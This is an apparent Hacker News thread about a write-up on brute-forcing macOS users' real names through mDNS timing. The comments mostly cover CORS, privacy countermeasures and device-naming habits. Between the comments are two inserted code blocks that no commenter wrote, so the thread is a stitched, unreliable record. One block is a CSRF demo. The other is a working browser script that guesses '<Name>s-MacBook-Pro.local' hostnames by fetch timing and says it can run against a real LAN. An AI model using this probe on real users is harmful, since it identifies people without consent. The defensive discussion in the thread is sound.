[HN Gopher] Brute-forcing a macOS user's real name from a browse...
___________________________________________________________________
Brute-forcing a macOS user's real name from a browser using mDNS
Author : danpinto
Score : 172 points
Date : 2023-07-13 17:24 UTC (5 hours ago)
(HTM) web link (fingerprint.com)
(TXT) w3m dump (fingerprint.com)
| powera wrote:
| If a web application is making dozens of requests to invalid
| domain names, shouldn't the web browser do something about it?
| vogon_laureate wrote:
| This is interesting, well written up and even has a nice proof of
| concept. Nicely done!
|
| A fun countermeasure would be to change the device hostname to
| something like atemptingurl.local that entices the attacker to
| try visiting that website where a webpage is carefully crafted to
| run the exact same technique on them and return:
|
| "Hi [hacker's device name]! Your machine information, IP address,
| geolocation and other fingerprint information has been captured
| and reported to [insert scary cyber agency here]." Even if they
| are seasoned veterans rather than script kiddies, it could at
| least give them a smile.
|
| People need more reasons to smile. :-)
| pyrolistical wrote:
| You would need to be running a http server with CORS allow all.
| You would then also reduce your own security as you are now
| exposed to all the bugs in the chosen http server
| darthwalsh wrote:
| Is there a way to prevent websites from the broader Internet from
| making network requests to my local network? I can't imagine why
| this should be allowed by default.
|
| (Not to suggest bringing back IE's Local Intranet Zone
| permission...)
| nonameiguess wrote:
| My WiFi access points allow me to configure networks so that no
| devices on it are allowed to make requests to the local
| network. I haven't done this with networks used by my PCs,
| though, just for televisions and IoT devices.
| TechBro8615 wrote:
| Brave recently added a feature requiring permission to access
| the local network:
|
| https://brave.com/privacy-updates/27-localhost-permission/
|
| On HN: https://news.ycombinator.com/item?id=36574775
| lagrange77 wrote:
| To avoid confusion, this is not about an internet server making
| requests to your local network, but your local web browser
| making those requests. Although, the javascript executed in the
| browser can be loaded from an internet server, of course.
| jamespwilliams wrote:
| https://developer.chrome.com/blog/private-network-access-pre...
| is one idea being actively worked on in this area
| Arnavion wrote:
| >This content is outdated and no longer accurate. New
| material available.
|
| The "new material" is
| https://developer.chrome.com/blog/private-network-access-
| upd... and changed from restricting all "public websites" to
| only restricting non-HTTPS sites.
|
| It does at least say:
|
| >Restricting private network requests to secure contexts is
| only the first step in launching Private Network Access.
|
| ... so maybe it'll become better later.
| Arnavion wrote:
| uBlock Origin static filter: ||local^$all
|
| This will block all requests to .local, even from .local
| itself. If you want to allow foo.local to talk to itself, say
| because you run a webserver on it, you'll have to add
| additional overrides for each such domain:
| @@||foo.local^$domain=foo.local,all
|
| ... or if you trust your .local entirely to allow any foo.local
| to talk to any bar.local, you can add one override for all of
| .local: @@||local^$domain=local,all
| [deleted]
| collsni wrote:
| This essentially blocks all .local domains from the browser
| user gen or not
| capableweb wrote:
| They generally can't, because of CORS. The only reason this
| "hack" works is because the timing of the rejection is
| different between non-resolving domain request and resolving-
| but-rejected request. But if you run something on
| https://192.168.2.1 it can't be accessed from a web app running
| on https://my-own-domain.com unless the service running at
| 192.168.2.1 allows the "Origin" my-own-domain.com.
| doakes wrote:
| Technically they can make the request. The server will
| receive and respond to the request. CORS is applied by the
| browser which prevents the response from being read. This is
| why CORS doesn't prevent a request from mutating something on
| a server. A CSRF token does.
| aidos wrote:
| Is that true? There's a preflight request that checks with
| the server as to what's allowed and then the browser issues
| the original request if it's ok, right?
| lights0123 wrote:
| First of all, you could probably do a timing attack on
| CORS response, you'd just have to deal with how much
| they're cached.
|
| Depends on the resource request. For example, <img> can
| be used to load remote resources without CORS, since the
| image data isn't shared with JS (trying to read it via a
| canvas marks it "tainted", and errors read requests).
| Meltdown/Spectre breaks this barrier down, which led to
| the introduction of COOP/COEP headers that require CORS
| on remote requests and would break this attack-- _except_
| that you can ask the browser to send requests without
| cookies, re-introducing this timing attack.
| thakoppno wrote:
| There are plenty of browser implementations in things
| like SmartTVs that don't implement CORS and other
| security related features correctly.
| jakear wrote:
| "Simple requests" are not preflighted, such as those that
| do not set any headers (among other qualifications).
|
| https://developer.mozilla.org/en-
| US/docs/Web/HTTP/CORS#simpl...
|
| (Aside, is MDN's href linking broken for everyone or just
| me?)
| zaroth wrote:
| "Simple" requests are sent without a OPTIONS preflight
| check. It's because old style forms could always do a
| cross-origin request, so you have to protect against it
| anyway.
|
| For the full definition of what is a "simple" request:
| https://developer.mozilla.org/en-
| US/docs/Web/HTTP/CORS#simpl...
|
| EDIT: Lol @ jakear making an almost identical response
| with the same Mozilla link.
| tomjakubowski wrote:
| Not only forms, img and link tags supported cross origin
| sources too, with no user action required.
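On the point doakes, jakear, zaroth and tomjakubowski make above (a "simple" cross-origin request is sent without a preflight, reaches the server, and CORS only withholds the response from the page), here is an added example. It is not code from the article or from any commenter. It implements an approximation of the Fetch spec's simple-request test and contrasts a naive state-changing handler with one that checks the Origin header and a CSRF token. The bank and evil origins, the session cookie value, the token and the request object are all constructed for the example.

```javascript
// Added example (not code from the article or from any commenter): which
// cross-origin requests skip the OPTIONS preflight, and why a server must
// check Origin / a CSRF token itself rather than rely on CORS.

const SAFELISTED_HEADERS = new Set([
  "accept", "accept-language", "content-language", "content-type",
]);
const SAFELISTED_CONTENT_TYPES = new Set([
  "application/x-www-form-urlencoded", "multipart/form-data", "text/plain",
]);

// Approximation of the Fetch spec's "CORS-safelisted" rules: method is
// GET, HEAD or POST and every author-set header is safelisted. Headers the
// browser sets itself (Host, Origin, Cookie, User-Agent) are not author
// headers and do not trigger a preflight. Omitted details: the 128-byte
// header value limit and the Range header special case.
function isSimpleRequest(method, authorHeaders = {}) {
  if (!["GET", "HEAD", "POST"].includes(method.toUpperCase())) return false;
  for (const [name, value] of Object.entries(authorHeaders)) {
    const lower = name.toLowerCase();
    if (!SAFELISTED_HEADERS.has(lower)) return false;
    if (lower === "content-type") {
      const mime = String(value).split(";")[0].trim().toLowerCase();
      if (!SAFELISTED_CONTENT_TYPES.has(mime)) return false;
    }
  }
  return true;
}

// Naive handler: authenticates on the session cookie alone. A simple
// cross-origin POST (an auto-submitting HTML form, or fetch() with mode
// "no-cors") reaches this code with the victim's cookie attached and is
// applied. CORS only keeps the attacker's page from reading the response.
function naiveTransfer(state, req) {
  if (req.headers.cookie !== "session=alice") return { status: 401 };
  state.balance -= Number(req.body.amount);
  return { status: 200 };
}

// Hardened handler: reject a cross-site Origin (browsers attach Origin to
// every cross-origin POST) and require a per-session CSRF token, which a
// foreign origin cannot read because of the same-origin policy.
function hardenedTransfer(state, req, { allowedOrigin, csrfToken }) {
  if (req.headers.cookie !== "session=alice") return { status: 401 };
  const origin = req.headers.origin;
  if (origin !== undefined && origin !== allowedOrigin) {
    return { status: 403, reason: "origin not allowed" };
  }
  if (req.body.csrf !== csrfToken) {
    return { status: 403, reason: "missing or wrong csrf token" };
  }
  state.balance -= Number(req.body.amount);
  return { status: 200 };
}

// Constructed request, as a browser sends it when a logged-in user lands
// on https://evil.example and a form there auto-submits to the bank.
const CROSS_ORIGIN_POST = {
  method: "POST",
  headers: {
    origin: "https://evil.example",
    cookie: "session=alice",
    "content-type": "application/x-www-form-urlencoded",
  },
  body: { amount: "100" },
};

function demo() {
  // Only Content-Type was set by the attacker's form; the rest is browser-set.
  const authorHeaders = { "content-type": CROSS_ORIGIN_POST.headers["content-type"] };
  const naiveState = { balance: 500 };
  const hardenedState = { balance: 500 };
  const policy = { allowedOrigin: "https://bank.example", csrfToken: "t0k3n" };
  return {
    preflighted: !isSimpleRequest(CROSS_ORIGIN_POST.method, authorHeaders),
    naive: naiveTransfer(naiveState, CROSS_ORIGIN_POST),
    naiveBalance: naiveState.balance,        // 400: the transfer went through
    hardened: hardenedTransfer(hardenedState, CROSS_ORIGIN_POST, policy),
    hardenedBalance: hardenedState.balance,  // 500: rejected on Origin
  };
}

console.log(demo());
```

The preflight decision is made entirely by the browser, and the simple-request path exists because HTML forms, img and link tags could always fire cross-origin requests; a server that only sets Access-Control-Allow-Origin headers has not protected its state-changing endpoints at all. Rejecting on a mismatched Origin is cheap and catches the browser case; the token is the check that does not depend on which headers the client chose to send.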
| 1vuio0pswjnm7 wrote:
| Yes. Change the client. For example, I'm using one that does
| not auto-load resources, does not run Javascript and does not
| perform DNS prefetching. There is no way for the website (cf.
| user) to make network requests.
|
| This experiment is of course limited to users who do not change
| defaults, since any MacOS user can easily change their hostname
| to anything they want, and that is quite easy to do, even for
| people who do not read HN. The "real name" might not be real if
| the user has changed the default. Is there any reliable way for
| the website to distinguish "real" from "fake" names in MacOS
| hostnames?
| amarshall wrote:
| uBlock Origin ships with a (default disabled) "Block Outsider
| Intrusion into LAN" blocklist, it has some default exclusions
| though.
| https://github.com/uBlockOrigin/uAssets/blob/01eba0c1445c881...
|
| And, indeed, when I run the PoC from the article, all the
| requests are blocked by uB0.
| pilsetnieks wrote:
| iOS already has a Local Network Access permission, it's
| probably only a matter of time until it appears in macOS as
| well.
| userbinator wrote:
| _In the example above, the difference is four milliseconds for a
| valid address versus five seconds for an invalid one._
|
| This is surprising --- I'd expect a DNS lookup failure to be much
| faster than a default connection timeout which comes after a
| successful DNS lookup.
|
| That said, I've always found the <name>s-mac-xxxx to be a bit of
| an odd choice, especially considering it's from a company that
| advertises privacy as a huge selling point; either they don't
| expect you to use your real name, or this is a case where "user
| friendliness" took precedence. From the privacy perspective,
| Windows' randomly generated hostnames would be better.
| mlyle wrote:
| > default connection timeout which comes after a successful DNS
| lookup.
|
| In addition to the sibling's comment, the other factor is that
| they received a "connection refused" -- RST, not a connection
| timeout.
| liminalsunset wrote:
| The reason users' real names are in the hostnames is possibly
| because of AirDrop. The system appears to use the hostname for
| things like Personal Hotspot and AirDrop, and other types of
| names would probably lead to widespread confusion when it came
| time to share a file.
| rmccue wrote:
| > This is surprising --- I'd expect a DNS lookup failure to be
| much faster than a default connection timeout which comes after
| a successful DNS lookup.
|
| Unlike regular DNS where you're asking a single server at a
| single IP for a yes/no answer, mDNS is multicast, so no single
| server can authoritatively say no+. You can only detect that
| there are no records when the lookup times out because no
| servers have responded.
|
| + Not technically true, a device can say no if it knows it owns
| that name.
| jstrieb wrote:
| A similar type of timing attack can be used to port scan your
| local machine (and other devices on your local network) from your
| browser.
|
| https://github.com/Flu1dTeam/PortScanner
|
| A while ago, eBay got caught doing this.
|
| https://blog.nem.ec/2020/05/24/ebay-port-scanning/
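The mechanism userbinator, mlyle and rmccue are discussing (a name that resolves fails in milliseconds, with an RST or an opaque response, while a name nobody on the LAN claims only fails once the multicast query gives up) and the port-scan variant jstrieb mentions are both measure-and-threshold loops. Here is an added example, not code from the fingerprint.com write-up or from any commenter, that brute-forces a Bonjour hostname from a list of first names using that timing difference. The computer-name to hostname mapping ("Dan's MacBook Pro" becoming "Dans-MacBook-Pro.local"), the model suffix list, the one-second threshold and the simulated timings are assumptions or constructed inputs; only the 4 ms versus roughly 5 s figures come from the write-up as quoted above.

```javascript
// Added example (not code from the fingerprint.com write-up or any comment):
// brute-forcing a Bonjour hostname from a list of first names by timing how
// long a request to each candidate takes to settle. Uses only globals that
// exist in modern browsers and in Node >= 16 (fetch, performance).

// Assumption: macOS turns the computer name "Dan's MacBook Pro" into the
// Bonjour name "Dans-MacBook-Pro.local" (apostrophe dropped, spaces to
// hyphens). The model suffixes below are a constructed, non-exhaustive list.
const MODEL_SUFFIXES = ["MacBook-Pro", "MacBook-Air", "iMac", "Mac-mini"];

function candidateHostnames(firstNames, suffixes = MODEL_SUFFIXES) {
  const out = [];
  for (const name of firstNames) {
    for (const model of suffixes) out.push(`${name}s-${model}.local`);
  }
  return out;
}

// Browser-side probe. mode "no-cors" makes the response opaque, so the page
// learns nothing from the body; it only learns how long the fetch took to
// settle. A name that resolves settles in milliseconds, whether the port
// answers or sends an RST; a name nobody on the LAN claims only fails once
// the mDNS query gives up (about five seconds in the write-up).
async function browserProbeMs(hostname, port = 80) {
  const t0 = performance.now();
  try {
    await fetch(`http://${hostname}:${port}/`, { mode: "no-cors", cache: "no-store" });
  } catch (_err) {
    // A rejected promise is expected in both cases; only the timing matters.
  }
  return performance.now() - t0;
}

// Split measured timings into "resolved" and "no such host". Taking the
// minimum over repeats guards against one slow but resolving probe being
// misread as a timeout. thresholdMs is an assumed cut-off between the two
// populations (4 ms vs ~5000 ms in the write-up).
function classify(timings, thresholdMs = 1000) {
  const resolved = [];
  for (const [host, samples] of timings) {
    if (Math.min(...samples) < thresholdMs) resolved.push(host);
  }
  return resolved;
}

async function findHostnames(candidates, probe, { repeats = 2, thresholdMs = 1000 } = {}) {
  const timings = new Map();
  for (const host of candidates) {
    const samples = [];
    for (let i = 0; i < repeats; i++) samples.push(await probe(host));
    timings.set(host, samples);
  }
  return classify(timings, thresholdMs);
}

// Constructed stand-in for browserProbeMs that reproduces the two timings
// reported in the write-up (4 ms vs ~5 s) so the loop can run offline.
function simulatedProbe(presentHosts) {
  return async (host) => (presentHosts.has(host) ? 4 : 5000);
}

async function demo() {
  const candidates = candidateHostnames(["Alex", "Dan", "Maria"]);
  const probe = simulatedProbe(new Set(["Dans-MacBook-Pro.local"]));
  return findHostnames(candidates, probe);
}

if (typeof window === "undefined") {
  demo().then((hits) => console.log("resolved:", hits));
}
```

In a real page the probes would be fired concurrently rather than awaited one by one, since every miss costs the full mDNS timeout; the loop is serial here only to keep the classification readable. Swapping simulatedProbe for browserProbeMs is the whole change needed to run it against a LAN, and the countermeasures named in this thread (the uBlock Origin ||local^$all filter, its "Block Outsider Intrusion into LAN" list, Brave's local-network permission) work by making that fetch never leave the browser, so every candidate then looks the same to the classifier.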
| valventin wrote:
| I'm now thinking how this is related to Wi-Fi sharing. I've
| always renamed my device to avoid leaking my name when I'm
| sharing Wi-Fi. Interesting stuff.
| pyrolistical wrote:
| Could browsers mask this by turning connection refused into a 5
| second timeout in JavaScript but still show the actual error in
| the console (which JavaScript cannot read)?
|
| This should only trigger when JavaScript is making a request
| where CORS would kick in AND the connection is refused.
| watersb wrote:
| On my macOS box, I run Little Snitch, a nice UI that can be set
| to ask local user for explicit permission before allowing a
| network request.
|
| https://www.obdev.at/products/littlesnitch/index.html
|
| I've occasionally stumbled on it during remote logins, usually
| when an SSH session wants to download something new, like NPM
| requesting NodeJS bits. The text terminal SSH download will
| block; if I figure out it's the Little Snitch then I have to walk
| all the way to my desk downstairs, wiggle the mouse to wake up
| the monitor and unlock the screen saver, and click "Allow" on the
| Little Snitch dialog box.
|
| Works as intended.
|
| BUT by default it's common to set such things to silently allow
| local network requests, so I don't know if such shenanigans in
| the OP would work in my case.
| cyrnel wrote:
| In my case, I couldn't imagine configuring LittleSnitch to only
| allow certain hostnames from my browser. It has a "allow all
| traffic to 53/80/443" rule, otherwise most websites would flood
| me with hundreds of new LittleSnitch popups.
| inferiorhuman wrote:
| You'd think so, but the way I've set it up Little Snitch
| throws up a dialog box when a browser makes errant requests
| but otherwise remains silent. Most recently this caught
| Firefox trying to force DNS over HTTPS despite me having
| disabled it when it first became generally available. I
| suppose leaking DNS requests to Cloudflare isn't the worst
| thing in the world, but it would circumvent the ad blocking
| I've set up locally.
| krackers wrote:
| How _do_ you have it set up? What does errant request mean
| in this case? A request to a domain that you haven't
| allowed before?
| inferiorhuman wrote:
| Ah so I just dug into the rules. What happened was a
| plugin made a DNS request to mozilla.cloudflare-dns.com.
| I've nothing special set up for Firefox, but basically no
| rules for plugin-container, so when a plugin tries to
| make a DNS request Little Snitch pops up an alert.
|
| Not great I suppose, but better than nothing. Generally
| what I'll see for Firefox itself are requests for non
| 80/443 ports.
| doublerabbit wrote:
| I use NetFence [0] on my jail-broken iPhone.
|
| It's surprising what sneaky socket connections applications
| connect to, including bank apps.
|
| [0] https://havoc.app/package/netfence
| ezeki08 wrote:
| hola
| [deleted]
| mrbuttons454 wrote:
| Fortunately for me, my device is often named something like
| "xxxs's MacBook Pro (34)". It's not a bug, it's a feature.
| Syonyk wrote:
| The more time passes, the more comfortable I feel about mostly
| interacting with the internet from a Qubes box, in a disposable
| Whonix/Tor VM, with Javascript disabled...
|
| This is just gross. I mean, not surprising. But appalling in so
| many ways that it's even possible.
|
| If you're not familiar with fingerprint.com, they do "deep user
| profiling" - think "maintaining a constant user ID across
| computers, browsers, OSes, etc." They have a demo on the main
| page that's a little bit creepy in how good it is.
| joiqj wrote:
| As part of my standard (and pretty lame) OPSEC I always change
| the default names that apple gives its devices (like "Joiqj's
| iPhone") to a more generic name (like "iPhone"). Nice to see that
| it was good practice.
| nocsi wrote:
| I do that too. So if we're on the same network and conflict,
| it'll become "iPhone (1)", etc.
| Aachen wrote:
| I use a random person's name because anonymous could be me but
| e.g. Josephine most definitely isn't a bloke.
|
| A lesson learned with early feature phones and Bluetooth names
| in high school
|
| At home my wifis are currently Japanese emojis, but anything
| funny goes
| [deleted]
| wil421 wrote:
| I prefix all my device names with "My". My iPhone, My AirPods,
| My MacBook Air, and so on.
| franga2000 wrote:
| I do the opposite: one of my laptops is named "Peter's iPhone"
| (hint: my name is not Peter, nor do I own an iPhone) and I've
| also set all my Bluetooth to random Bluetooth headset or mouse
| models.
| Arech wrote:
| Bluetooth on my old phone is named as "Pfizer-BioNTech chip
| #<formatteddigits>" :D
| vorticalbox wrote:
| My hotspot on my phone is "FBI van 4"
| eindiran wrote:
| I see this joke frequently when looking at available wifi;
| is this meme a reference to a particular thing (other than
| the FBI having surveillance vans) or did a bunch of people
| just converge onto it?
| noduerme wrote:
| I've never seen it. Maybe it's spreading like a fungus
| from wifi to wifi in certain regions.
| vorticalbox wrote:
| I saw it as a meme years ago. I sadly don't know the
| origin.
| karim79 wrote:
| One of the hotspots in my flat is called "Honeypot1"
| cozzyd wrote:
| I wonder if I can sell my WiFI AP name to some
| advertiser...
|
| "ENJOY COCA-COLA"
|
| or more likely
|
| "TOM BRADY SAYS BUY CRYPTO"
| dev_tty01 wrote:
| In the early days of insecure WiFi, in apartment buildings
| you would see network names like "Don't steal our WiFi Room
| 238!"
| bcx wrote:
| I like this idea, but any sophisticated attacker will ignore
| the Bluetooth names and just pull vendors off the MAC
| addresses. Though it would be interesting if you can define
| the Bluetooth MAC addressees in software to match your fake
| names :)
| accrual wrote:
| I used to do something similar with my router. I would run
| an AP called "Linksys" or something common and give it an
| OUI belonging to Cisco. It probably had no benefit (maybe
| even harmful!), but it was fun to "disguise" my OpenBSD
| router as a common off the shelf router.
| ok123456 wrote:
| I name my computer: 'router'
| doubled112 wrote:
| To be fair, it probably will route if you ask it.
| pndy wrote:
| That reminded me that almost 10 years ago ghacks [1] instructed
| people to add _nomap to their Wifi networks name to avoid these
| being harvested by Google and Mozilla. I wonder if that ever
| worked or still does and if companies stopped collecting that
| information.
|
| [1] - https://www.ghacks.net/2014/10/29/add-_nomap-to-your-
| routers...
| hot_gril wrote:
| The hostname is derived from the admin user's name, which ought
| to also be fake. My "full name," unix username, and hostname
| are all a nice short "me".
| tentacleuno wrote:
| It might sound a bit silly, but I've had pretty good results
| just naming my devices after Pokemon. Whenever I have a new
| device, I open the Pokemon DB[0], choose one at random, and
| then add it to my .csv file of device names -> what they are
| and what role they perform.
|
| [0]: https://www.pokemon.com/uk/pokedex
| johannes1234321 wrote:
| If you look for a naming scheme, this wiki has you covered:
|
| https://namingschemes.com/Main_Page
| jabbany wrote:
| This is not silly at all :-)
|
| Seems pretty in line with the RFC about this
| https://www.ietf.org/rfc/rfc1178.txt
|
| I do something similar but with other mobile/gacha game
| characters since those names are always in abundance. I also
| try to do some kind of correlation with the fictional
| settings too (groups of devices will correspond to meaningful
| in-domain names)
|
| For non-mobile devices like workstations or servers, I also
| tend to directly give FQDN, like (name).(location).(my-
| personal-domain.tld)
| dunham wrote:
| I've been using chili peppers (peri, shishito, ancho, ...)
| for my devices for the last few years. Many years before
| that, I was using named swords (notung, glamdring, sting,
| etc).
|
| Back in college my boss named a sun workstation lab with
| aleutian islands, and another after indonesian islands. (Some
| of those were fun to remember, there was an umnak and an
| unimak.) The servers were named after seas and oceans. We
| tried to name a new lab of windows machines after bugs, but
| the department nixed that.
| varenc wrote:
| I do the same thing but with Star Trek words! I have a
| somewhat logical naming scheme too. Computers are named after
| Star Trek ships (Yorktown), phones are named after handheld
| devices (Phaser), and drives are storage related things
| (Isolinear). And my printers are just named Replicator and
| Synthesizer.
| nneonneo wrote:
| Rather than choosing at random, I like to pick names that
| have some relation to the device in question, e.g. "Pichu"
| for a tiny mobile device, "Snorlax" for the big slow machine,
| "Articuno/Zapdos/Moltres" for three successive powerful
| servers, etc. What's extra fun about Pokemon, if you're
| familiar with the franchise, is that you can pick names based
| on generation, with older generations for e.g. older devices,
| and if you're _really_ familiar with the franchise you could
| even pick names based on types or other characteristics.
| acer589 wrote:
| Very similar here. PCs get Pokemon region names (MacBook is
| Johto), non-PC Ethernet connected devices get Professor
| names, all other devices are Pokemon.
| tentacleuno wrote:
| Oh, I do the same! For instance, zygarde is my 14TB NAS,
| which I consider pretty big. I'm not familiar with the
| franchise though :)
| vogon_laureate wrote:
| I've historically preferred to use Culture series ship names
| (eg. GCU Grey Area, GCU Jaundiced Outlook, etc.), but stopped
| after Elon started naming his SpaceX ships like that.
|
| I then went for Scottish Single Malt names (eg. Laphroaig,
| Jura, etc.).
|
| After quitting alcohol, I've now settled on Douglas Adams
| names (eg. Deep Thought, Grunthos the Flatulent, etc.).
|
| Naming machines is the most fun part of the job.
| oktwtf wrote:
| My go-to is either gods from Norse mythology, or Transformers
| for servers.
|
| I set my iPhone to an emoji, and apparently it's one of the
| emojis that is composed of multiple emojis to render
| correctly. It's fun to see how every device it connects to
| draws the emoji or more likely boxes a little different.
| collsni wrote:
| If only disabling JavaScript didn't disable end user experience
| lol
| cwales95 wrote:
| This is the only thing stopping me from globally disabling
| JavaScript.
|
| I predict in the future though, I'll have no choice but to
| have it off by default due to privacy concerns.
___________________________________________________________________
(page generated 2023-07-13 23:00 UTC)